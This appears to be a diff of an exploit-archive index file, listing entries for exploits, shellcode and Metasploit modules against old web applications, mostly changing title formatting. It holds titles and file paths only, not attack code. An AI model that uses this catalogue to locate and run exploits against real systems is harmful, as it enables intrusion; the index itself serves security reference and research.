+41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15898,7 +15901,7 @@ id,file,description,date,author,platform,type,port 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 858,platforms/php/webapps/858.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 -860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 +860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-03-07,"Francisco Alisson",cgi,webapps,0 864,platforms/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews 1.3 - (skinfile) Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 @@ -15921,7 +15924,7 @@ id,file,description,date,author,platform,type,port 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 -954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0 +954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,cgi,webapps,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 982,platforms/php/webapps/982.c,"ZeroBoard Worm - Source Code",2005-05-06,anonymous,php,webapps,0 989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 @@ -15962,9 +15965,9 @@ id,file,description,date,author,platform,type,port 1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,php,webapps,0 1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution",2005-06-22,"Alberto Trivero",php,webapps,0 1068,platforms/php/webapps/1068.pl,"PHP-Fusion 6.00.105 - Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 -1069,platforms/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - (mailthread.php) SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0 -1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - (article.asp) SQL Injection",2005-06-27,mh_p0rtal,asp,webapps,0 -1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - (comment_post.asp) SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps,0 +1069,platforms/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0 +1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - 'article.asp' SQL Injection",2005-06-27,mh_p0rtal,asp,webapps,0 +1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - 'comment_post.asp' SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps,0 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps,0 @@ -16009,7 +16012,7 @@ id,file,description,date,author,platform,type,port 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 -1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution",2005-10-14,rgod,php,webapps,0 +1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,php,webapps,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,php,webapps,0 1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,php,webapps,0 @@ -16023,14 +16026,14 @@ id,file,description,date,author,platform,type,port 1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0 -1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - (show.php id) SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 +1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - (TopicID) SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - (msg/forum) SQL Injection",2005-11-16,rgod,php,webapps,0 1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - (forum) SQL Injection",2005-11-16,AhLam,php,webapps,0 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps,0 -1340,platforms/php/webapps/1340.php,"eFiction 2.0 - (Fake .gif) Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 +1340,platforms/php/webapps/1340.php,"eFiction 2.0 - 'Fake .gif' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 @@ -16051,9 +16054,9 @@ id,file,description,date,author,platform,type,port 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,php,webapps,0 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / 3.06 - Login Bypass (SQL Injection)",2005-12-30,DevilBox,asp,webapps,0 -1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - (categories.mdu) Remote Command Execution",2006-01-01,cijfer,php,webapps,0 +1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution",2006-01-03,cijfer,php,webapps,0 -1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - (file_editor.php) Remote Command Execution",2006-01-04,cijfer,php,webapps,0 +1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,php,webapps,0 1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' Parameter SQL Injection",2006-01-14,DetMyl,asp,webapps,0 @@ -16070,12 +16073,12 @@ id,file,description,date,author,platform,type,port 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 -1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0 +1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,php,webapps,0 1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 -1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 +1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - (title_op) SQL Injection",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",php,webapps,0 1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 @@ -16087,15 +16090,15 @@ id,file,description,date,author,platform,type,port 1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,asp,webapps,0 -1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 +1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution Exploit",2006-02-20,rgod,php,webapps,0 1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - (tid) SQL Injection",2006-02-20,x128,php,webapps,0 1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution",2006-02-23,rgod,php,webapps,0 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 < 7.8 - 'Search' SQL Injection",2006-02-23,unitedbr,php,webapps,0 1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass",2006-02-23,RoMaNSoFt,php,webapps,0 -1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full - (topics.php) SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 +1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full - 'topics.php' SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta - (fid) SQL Injection",2006-02-24,x128,php,webapps,0 -1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution",2006-02-25,rgod,php,webapps,0 +1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - 'config_inc.php' Remote Code Execution",2006-02-25,rgod,php,webapps,0 1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - (newsdetailsview) SQL Injection",2006-02-25,nukedx,asp,webapps,0 1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass",2006-02-25,nukedx,asp,webapps,0 1530,platforms/php/webapps/1530.pl,"saPHP Lesson 2.0 - (forumid) SQL Injection",2006-02-25,SnIpEr_SA,php,webapps,0 @@ -16111,11 +16114,11 @@ id,file,description,date,author,platform,type,port 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 -1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection",2006-03-04,nukedx,asp,webapps,0 +1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - 'index.asp id' SQL Injection",2006-03-04,nukedx,asp,webapps,0 1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution",2006-03-04,uid0,php,webapps,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - (load) SQL Injection",2006-03-06,SkOd,php,webapps,0 1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution",2006-03-07,rgod,php,webapps,0 -1562,platforms/asp/webapps/1562.pl,"CilemNews System 1.1 - (yazdir.asp haber_id) SQL Injection",2006-03-07,nukedx,asp,webapps,0 +1562,platforms/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp haber_id' SQL Injection",2006-03-07,nukedx,asp,webapps,0 1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Parameter Remote Code Execution (Metasploit)",2006-03-07,sirh0t,php,webapps,0 1566,platforms/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0 @@ -16130,24 +16133,24 @@ id,file,description,date,author,platform,type,port 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,php,webapps,0 1588,platforms/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,asp,webapps,0 -1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - (savesettings.php) Remote Code Execution",2006-03-18,DarkFig,php,webapps,0 +1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - 'savesettings.php' Remote Code Execution",2006-03-18,DarkFig,php,webapps,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Blind SQL Injection",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' Parameter SQL Injection",2006-03-20,nukedx,asp,webapps,0 -1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution",2006-03-21,x128,php,webapps,0 +1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - 'images.php' Remote Code Execution",2006-03-21,x128,php,webapps,0 1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 -1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 +1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0 -1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - (myadmin.php) User Privilege Escalation",2006-03-26,Sparah,php,webapps,0 +1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps,0 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps,0 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,php,webapps,0 1621,platforms/php/webapps/1621.php,"Plogger Beta 2.1 - Administrative Credentials Disclosure",2006-03-28,rgod,php,webapps,0 1623,platforms/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - (Scheme) SQL Injection",2006-03-29,nukedx,asp,webapps,0 -1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - (scormExport.inc.php) Remote Code Execution",2006-03-30,rgod,php,webapps,0 +1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - 'scormExport.inc.php' Remote Code Execution",2006-03-30,rgod,php,webapps,0 1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - (libpath) Remote File Inclusion",2006-04-01,uid0,php,webapps,0 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - 'vwar_root2' Remote File Inclusion",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution",2006-04-02,rgod,php,webapps,0 @@ -16162,33 +16165,33 @@ id,file,description,date,author,platform,type,port 1653,platforms/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,php,webapps,0 1654,platforms/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps,0 1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,php,webapps,0 -1656,platforms/php/webapps/1656.txt,"Sire 2.0 - (lire.php) Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 +1656,platforms/php/webapps/1656.txt,"Sire 2.0 - 'lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1659,platforms/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,php,webapps,0 1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps,0 1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 -1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - (configset.php) Arbitrary Remote File Inclusion",2006-04-12,rgod,php,webapps,0 +1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - 'configset.php' Arbitrary Remote File Inclusion",2006-04-12,rgod,php,webapps,0 1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,php,webapps,0 1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,php,webapps,0 -1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - (censtore.cgi) Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 -1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - (quizz.pl) Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 +1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - 'censtore.cgi' Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 +1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - 'quizz.pl' Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,php,webapps,0 1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 -1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution",2006-04-14,rgod,cgi,webapps,0 +1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,php,webapps,0 1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - 'LOGIN' SQL Injection (Metasploit)",2006-04-15,Nicob,cgi,webapps,0 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0 -1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 +1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - '/inc/start.php _COOKIE' SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 -1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - (Haberler.asp) SQL Injection",2006-04-19,nukedx,asp,webapps,0 +1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0 1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' Parameter SQL Injection",2006-04-21,nukedx,php,webapps,0 1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 @@ -16196,8 +16199,8 @@ id,file,description,date,author,platform,type,port 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps,0 1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 -1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - (function/showprofile.php) SQL Injection",2006-04-24,Devil-00,php,webapps,0 -1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 +1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - 'function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps,0 +1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0 1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0 1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 @@ -16212,21 +16215,21 @@ id,file,description,date,author,platform,type,port 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0 -1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 +1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - 'show.php' Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' Parameter SQL Injection",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 -1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution",2006-05-06,[Oo],php,webapps,0 -1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) SQL Injection",2006-05-06,tracewar,asp,webapps,0 +1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - 